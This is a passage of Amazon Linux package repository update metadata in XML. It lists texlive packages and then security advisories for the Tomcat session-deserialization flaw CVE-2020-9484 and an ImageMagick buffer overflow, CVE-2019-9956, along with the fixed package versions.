release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-eps-doc-svn15878.1.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-glyphlist" version="svn28576.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-glyphlist-svn28576.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-realscripts-doc" version="svn29423.0.3b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-realscripts-doc-svn29423.0.3b-45.amzn1.noarch.rpm</filename></package><package name="texlive-wrapfig-doc" version="svn22048.3.6" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wrapfig-doc-svn22048.3.6-45.amzn1.noarch.rpm</filename></package><package name="texlive-currfile-doc" version="svn29012.0.7b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-currfile-doc-svn29012.0.7b-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvips" version="svn29585.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvips-svn29585.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-hyphenat-doc" version="svn15878.2.3c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyphenat-doc-svn15878.2.3c-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancyref" version="svn15878.0.9c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancyref-svn15878.0.9c-45.amzn1.noarch.rpm</filename></package><package name="texlive-zapfding" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-zapfding-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-debuginfo" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-debuginfo-2012-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-listings-doc" version="svn15878.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-listings-doc-svn15878.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-makecmds" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-makecmds-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-parallel" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-parallel-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-kpathsea" version="svn28792.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-kpathsea-svn28792.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-underscore-doc" version="svn18261.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-underscore-doc-svn18261.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cmap-doc" version="svn26568.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cmap-doc-svn26568.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-hyph-utf8" version="svn29641.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyph-utf8-svn29641.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xeindex" version="svn16760.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xeindex-svn16760.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-fix2col-doc" version="svn17133.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fix2col-doc-svn17133.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-placeins-doc" version="svn19848.2.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-placeins-doc-svn19848.2.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-ctable" version="svn26694.1.23" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ctable-svn26694.1.23-45.amzn1.noarch.rpm</filename></package><package name="texlive-ae-doc" version="svn15878.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ae-doc-svn15878.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-threeparttable" version="svn17383.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-threeparttable-svn17383.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-geometry-doc" version="svn19716.5.6" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-geometry-doc-svn19716.5.6-45.amzn1.noarch.rpm</filename></package><package name="texlive-metalogo" version="svn18611.0.12" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-metalogo-svn18611.0.12-45.amzn1.noarch.rpm</filename></package><package name="texlive-attachfile-doc" version="svn21866.v1.5b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-attachfile-doc-svn21866.v1.5b-45.amzn1.noarch.rpm</filename></package><package name="texlive-thumbpdf" version="svn26689.3.15" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-thumbpdf-svn26689.3.15-45.amzn1.noarch.rpm</filename></package><package name="texlive-subfigure" version="svn15878.2.1.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-subfigure-svn15878.2.1.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-collection-htmlxml" version="svn28251.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-collection-htmlxml-svn28251.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-luaotfload-bin" version="svn18579.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luaotfload-bin-svn18579.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-etoolbox-doc" version="svn20922.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-etoolbox-doc-svn20922.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-euenc" version="svn19795.0.1h" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-euenc-svn19795.0.1h-45.amzn1.noarch.rpm</filename></package><package name="texlive-bibtex-doc" version="svn26689.0.99d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bibtex-doc-svn26689.0.99d-45.amzn1.noarch.rpm</filename></package><package name="texlive-cmap" version="svn26568.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cmap-svn26568.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-appendix-doc" version="svn15878.1.2b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-appendix-doc-svn15878.1.2b-45.amzn1.noarch.rpm</filename></package><package name="texlive-euler-doc" version="svn17261.2.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-euler-doc-svn17261.2.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-iftex-doc" version="svn29654.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-iftex-doc-svn29654.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-mathspec-doc" version="svn15878.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mathspec-doc-svn15878.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifxetex" version="svn19685.0.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifxetex-svn19685.0.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-metafont-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-metafont-bin-svn26912.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-framed-doc" version="svn26789.0.96" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-framed-doc-svn26789.0.96-45.amzn1.noarch.rpm</filename></package><package name="texlive-ptext" version="svn28124.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ptext-svn28124.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-pdftex-doc" version="svn29585.1.40.11" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pdftex-doc-svn29585.1.40.11-45.amzn1.noarch.rpm</filename></package><package name="texlive-typehtml-doc" version="svn17134.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-typehtml-doc-svn17134.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-kastrup-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-kastrup-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tools" version="svn26263.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tools-svn26263.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-marvosym-doc" version="svn29349.2.2a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-marvosym-doc-svn29349.2.2a-45.amzn1.noarch.rpm</filename></package><package name="texlive-epstopdf-bin" version="svn18336.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-epstopdf-bin-svn18336.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-xecolor-doc" version="svn29660.0.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xecolor-doc-svn29660.0.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-subfig" version="svn15878.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-subfig-svn15878.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancyvrb-doc" version="svn18492.2.8" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancyvrb-doc-svn18492.2.8-45.amzn1.noarch.rpm</filename></package><package name="texlive-cjk-doc" version="svn26296.4.8.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cjk-doc-svn26296.4.8.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-qstest" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-qstest-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancybox" version="svn18304.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancybox-svn18304.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-makeindex" version="svn26689.2.12" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-makeindex-svn26689.2.12-45.amzn1.noarch.rpm</filename></package><package name="texlive-lettrine-doc" version="svn29391.1.64" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lettrine-doc-svn29391.1.64-45.amzn1.noarch.rpm</filename></package><package name="texlive-jadetex-bin" version="svn3006.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-jadetex-bin-svn3006.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-varwidth" version="svn24104.0.92" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-varwidth-svn24104.0.92-45.amzn1.noarch.rpm</filename></package><package name="texlive-svn-prov-doc" version="svn18017.3.1862" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-svn-prov-doc-svn18017.3.1862-45.amzn1.noarch.rpm</filename></package><package name="texlive-jknapltx" version="svn19440.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-jknapltx-svn19440.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-sepnum-doc" version="svn20186.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sepnum-doc-svn20186.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bigfoot" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bigfoot-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cm-lgc" version="svn28250.0.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cm-lgc-svn28250.0.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-powerdot" version="svn25656.1.4i" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-powerdot-svn25656.1.4i-45.amzn1.noarch.rpm</filename></package><package name="texlive-beton" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-beton-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-latex" version="svn27907.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latex-svn27907.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-babelbib-doc" version="svn25245.1.31" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-babelbib-doc-svn25245.1.31-45.amzn1.noarch.rpm</filename></package><package name="texlive-xdvi" version="svn26689.22.85" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xdvi-svn26689.22.85-45.amzn1.noarch.rpm</filename></package><package name="texlive-l3packages" version="svn29361.SVN_4467" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-l3packages-svn29361.SVN_4467-45.amzn1.noarch.rpm</filename></package><package name="texlive-xmltex-doc" version="svn28273.0.8" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xmltex-doc-svn28273.0.8-45.amzn1.noarch.rpm</filename></package><package name="texlive-realscripts" version="svn29423.0.3b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-realscripts-svn29423.0.3b-45.amzn1.noarch.rpm</filename></package><package name="texlive-symbol" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-symbol-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-section" version="svn20180.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-section-svn20180.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex-gyre" version="svn18651.2.004" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex-gyre-svn18651.2.004-45.amzn1.noarch.rpm</filename></package><package name="texlive-url" version="svn16864.3.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-url-svn16864.3.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-soul-doc" version="svn15878.2.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-soul-doc-svn15878.2.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-textpos-doc" version="svn28261.1.7h" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-textpos-doc-svn28261.1.7h-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifluatex" version="svn26725.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifluatex-svn26725.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-sectsty-doc" version="svn15878.2.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sectsty-doc-svn15878.2.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-xesearch" version="svn16041.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xesearch-svn16041.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-eurosym" version="svn17265.1.4_subrfix" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-eurosym-svn17265.1.4_subrfix-45.amzn1.noarch.rpm</filename></package><package name="texlive-scheme-basic" version="svn25923.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-scheme-basic-svn25923.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-xcolor-doc" version="svn15878.2.11" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xcolor-doc-svn15878.2.11-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvips-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-dvips-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-gsftopk" version="svn26689.1.19.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-gsftopk-svn26689.1.19.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-latex-bin-bin" version="svn14050.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-latex-bin-bin-svn14050.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-filecontents" version="svn24250.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-filecontents-svn24250.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-jadetex" version="svn23409.3.13" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-jadetex-svn23409.3.13-45.amzn1.noarch.rpm</filename></package><package name="texlive-arphic-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-arphic-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-eso-pic-doc" version="svn21515.2.0c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-eso-pic-doc-svn21515.2.0c-45.amzn1.noarch.rpm</filename></package><package name="texlive-mfnfss-doc" version="svn19410.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mfnfss-doc-svn19410.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-jadetex-doc" version="svn23409.3.13" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-jadetex-doc-svn23409.3.13-45.amzn1.noarch.rpm</filename></package><package name="texlive-changepage-doc" version="svn15878.1.0c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-changepage-doc-svn15878.1.0c-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-def" version="svn29154.0.95" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xetex-def-svn29154.0.95-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-grad-doc" version="svn15878.1.06" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-grad-doc-svn15878.1.06-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-blur" version="svn15878.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-blur-svn15878.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-luatex" version="svn26689.0.70.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luatex-svn26689.0.70.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-texlive.infra-bin" version="svn22566.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-texlive.infra-bin-svn22566.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-gsftopk-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-gsftopk-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-makeindex-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-makeindex-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-xdvi-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-xdvi-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-fontware-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-fontware-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-debuginfo" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-debuginfo-2012-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-xetex-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-xetex-bin-svn26912.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-metapost-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-metapost-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-pdftex-bin" version="svn27321.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-pdftex-bin-svn27321.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-kpathsea-bin" version="svn27347.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-kpathsea-bin-svn27347.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-metafont-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-metafont-bin-svn26912.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-2012-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-bibtex-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-bibtex-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-dvipdfmx-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-dvipdfmx-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-kpathsea-lib" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-kpathsea-lib-2012-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-kpathsea-lib-devel" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-kpathsea-lib-devel-2012-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-dvipng-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-dvipng-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-mfware-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-mfware-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-tex4ht-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-tex4ht-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-dvips-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-dvips-bin-svn26509.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-luatex-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-luatex-bin-svn26912.0-45.20130427_r30134.amzn1.i686.rpm</filename></package><package name="texlive-tex-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="i686"><filename>Packages/texlive-tex-bin-svn26912.0-45.20130427_r30134.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1389</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1389: important priority package update for tomcat7</title><issued date="2020-06-23 06:45:00" /><updated date="2020-06-26 04:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-9484:
When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.
1838332: CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9484" title="" id="CVE-2020-9484" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-jsp-2.2-api" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.104-1.38.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.104" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.104-1.38.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1390</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1390: important priority package update for tomcat8</title><issued date="2020-06-23 06:47:00" /><updated date="2020-06-26 04:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-9484:
When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.
1838332: CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9484" title="" id="CVE-2020-9484" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.56-1.84.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.56" release="1.84.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.56-1.84.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1391</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1391: medium priority package update for php-pecl-imagick</title><issued date="2020-06-23 07:03:00" /><updated date="2020-07-15 17:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
1692300: CVE-2019-9956 imagemagick: stack-based buffer overflow in function PopHexPixel in coders/ps.c
